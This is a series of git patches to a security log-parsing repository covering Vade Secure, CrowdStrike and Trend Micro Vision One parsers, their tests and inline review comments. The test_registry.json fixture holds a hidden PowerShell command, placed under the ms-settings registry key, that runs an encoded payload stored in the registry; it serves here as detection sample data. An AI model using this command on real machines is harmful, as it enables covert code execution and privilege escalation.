@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], 
\"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + 
"filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } +} \ No newline at end of file From cb5456827e5201fd75229cc4770a445a72738be0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:59:10 +0100 Subject: [PATCH 062/150] CrowdStrike telemetry: fix on parsing error --- CrowdStrike/crowdstrike-telemetry/_meta/fields.yml | 5 ----- CrowdStrike/crowdstrike-telemetry/ingest/parser.yml | 7 ++----- .../crowdstrike-telemetry/tests/telemetry_event_26.json | 5 ++++- 3 files changed, 6 insertions(+), 11 deletions(-) diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index 75e1b7434..a59b68006 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,8 +1,3 @@ -crowdstrike.base_filename: - description: Base Filename - name: crowdstrike.base_filename - type: keyword - crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index 03e9819e7..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,9 +53,6 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" - - set: - crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" - set_registry_fields: actions: - set: 
@@ -180,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 1e7368eee..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,7 +18,6 @@ "id": "111111111111111" }, "crowdstrike": { - "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { @@ -34,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" From fa87d4f91aea0f4fe26bdcaa466793c87268fddf Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 10:51:50 +0200 Subject: [PATCH 063/150] Smart descs --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index 7a3ee9d51..742eee7cc 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json 
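Review bot: The `process.command_line` fallback to `ContextBaseFileName` stores a bare file name in a field that is supposed to hold a command line; the fixture in this same patch pins exactly that (`"command_line": "svchost.exe"`). Detection rules that parse arguments out of `process.command_line` would then run on a value that never carried any, and an event with no `CommandLine` at all becomes indistinguishable from a launch with no arguments, so the fallback fits `process.name` but not `process.command_line`: `"process.command_line": "{{parsed_event.message.CommandLine}}"`. For the `process.name` line, the filter binds tighter than `or`, so the intended reading `(ImageFileName | basename) or ContextBaseFileName` is what Jinja evaluates; parenthesising it makes that explicit to the next reader: `"process.name": "{{(parsed_event.message.ImageFileName | basename) or parsed_event.message.ContextBaseFileName}}"`. The enclosing `set` starts before the hunk.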
@@ -1,4 +1,8 @@ [ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, { "value": "{event.reason}", "conditions": [{ "field": "event.reason" }] From 7b8703b20c6bbccf5d801d9dda0f06c9b05431ce Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 12:24:27 +0200 Subject: [PATCH 064/150] Fixes and improvements --- .../trend-micro-vision-one/ingest/parser.yml | 22 +++++++++++-------- .../tests/test_registry.json | 3 ++- 2 files changed, 15 insertions(+), 10 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index be400399d..a13ee54b2 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
@@ -39,14 +39,19 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + - set: registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" - registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} 
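Review bot: `process.pid` is filled from the `objectPid` indicator while every sibling key in the same `set` reads a `process*` indicator (`processCmd`, `processFilePath`, `processFileHashSha1`/`Sha256`), and in the Vision One payload added later in this series the `object*` indicators describe a different entity than the `process*` ones (`objectFilePath` is the downloaded scanner, `processFilePath` is explorer.exe), so the pid attached to `process.executable` would presumably belong to another process. If the source exposes a process-side pid indicator it should be used here; otherwise mark the assumption, e.g. `# objectPid describes the object entity, not the process* entity mapped above — confirm`. Separately, this hunk drops the `registry.value` mapping (the `registry_value` indicator) without a replacement, so any rule or fields.yml entry naming `registry.value` silently stops populating; that deserves a mention in the commit message if intentional. The `registry.path` block scalar continues into the next hunk.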
@@ -57,22 +62,21 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - # @todo should be along with registry.data.type to REG_SZ registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + - set: trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" 
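Review bot: The new action hardcodes `registry.data.type: "REG_SZ"` for every alert that carries a `registry_value_data` indicator, yet nothing in the payload states the value type — the removed `@todo` comment only recorded the intent, and the `test_registry.json` fixture in this patch happens to be a string value. A DWORD or binary value from the same indicator would be labelled REG_SZ, which misleads rules that branch on `registry.data.type`. Either keep the assumption visible with a comment above the action, e.g. `# Vision One does not expose the registry value type; REG_SZ is assumed — confirm with non-string samples`, or restrict the filter to values that are not numeric. The earlier `set` blocks this hunk touches start in the previous hunk.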
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index f9873edf1..3c32834ae 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -41,7 +41,8 @@ }, "registry": { "data": { - "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" }, "hive": "hkcr", "key": "ms-settings\\shell\\open\\command", From bc86ba96e28498fa916cca216790f5b8094d6d16 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 15:51:21 +0200 Subject: [PATCH 065/150] Add test --- .../tests/test_internal_network_scanner.json | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..e6bcf0088 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json 
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", 
\"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], 
\"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", 
\"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "john\\doe", + "name": "john\\doe" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": 
"New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "name": "doe" + } + } +} \ No newline at end of file From f2de94f0d1331ad57d49d1dcd514a59ee4fce317 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Wed, 20 Nov 2024 16:13:59 +0100 Subject: [PATCH 066/150] Update VadeSecure/vade_secure_m365/_meta/fields.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- VadeSecure/vade_secure_m365/_meta/fields.yml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index a3f60b15c..3dae6aab9 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,10 +58,20 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details: - description: Details of security protocols, mostly SPF, DKIM and DMARC. - name: vadesecure.auth_results_details - type: object +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + +vadesecure.auth_results_details.dkim: + description: The result of the DomainKeys Identified Mail (DKIM) + name: vadesecure.auth_results_details.dkim + type: keyword + +vadesecure.auth_results_details.dmarc: + description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + name: vadesecure.auth_results_details.dmarc + type: keyword vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. From 89031da02131389356f2da10693a5c1a31cbdac1 Mon Sep 17 00:00:00 2001 
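Review bot: The new `vadesecure.auth_results_details.dmarc` description misspells the acronym's expansion as `Domand-based`; DMARC is Domain-based Message Authentication, Reporting and Conformance, so the line should read `description: Result of the Domain-based Message Authentication, Reporting and Conformance (DMARC) check`. The three `keyword` fields also replace the former `object` declaration whose description said the details were "mostly" SPF, DKIM and DMARC, so any other key the source places under `auth_results_details` is now undeclared — worth confirming against a real event before dropping the object type. For consistency the SPF and DKIM entries could likewise say `The result of the ... check`, since the value is a verdict rather than the protocol itself.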
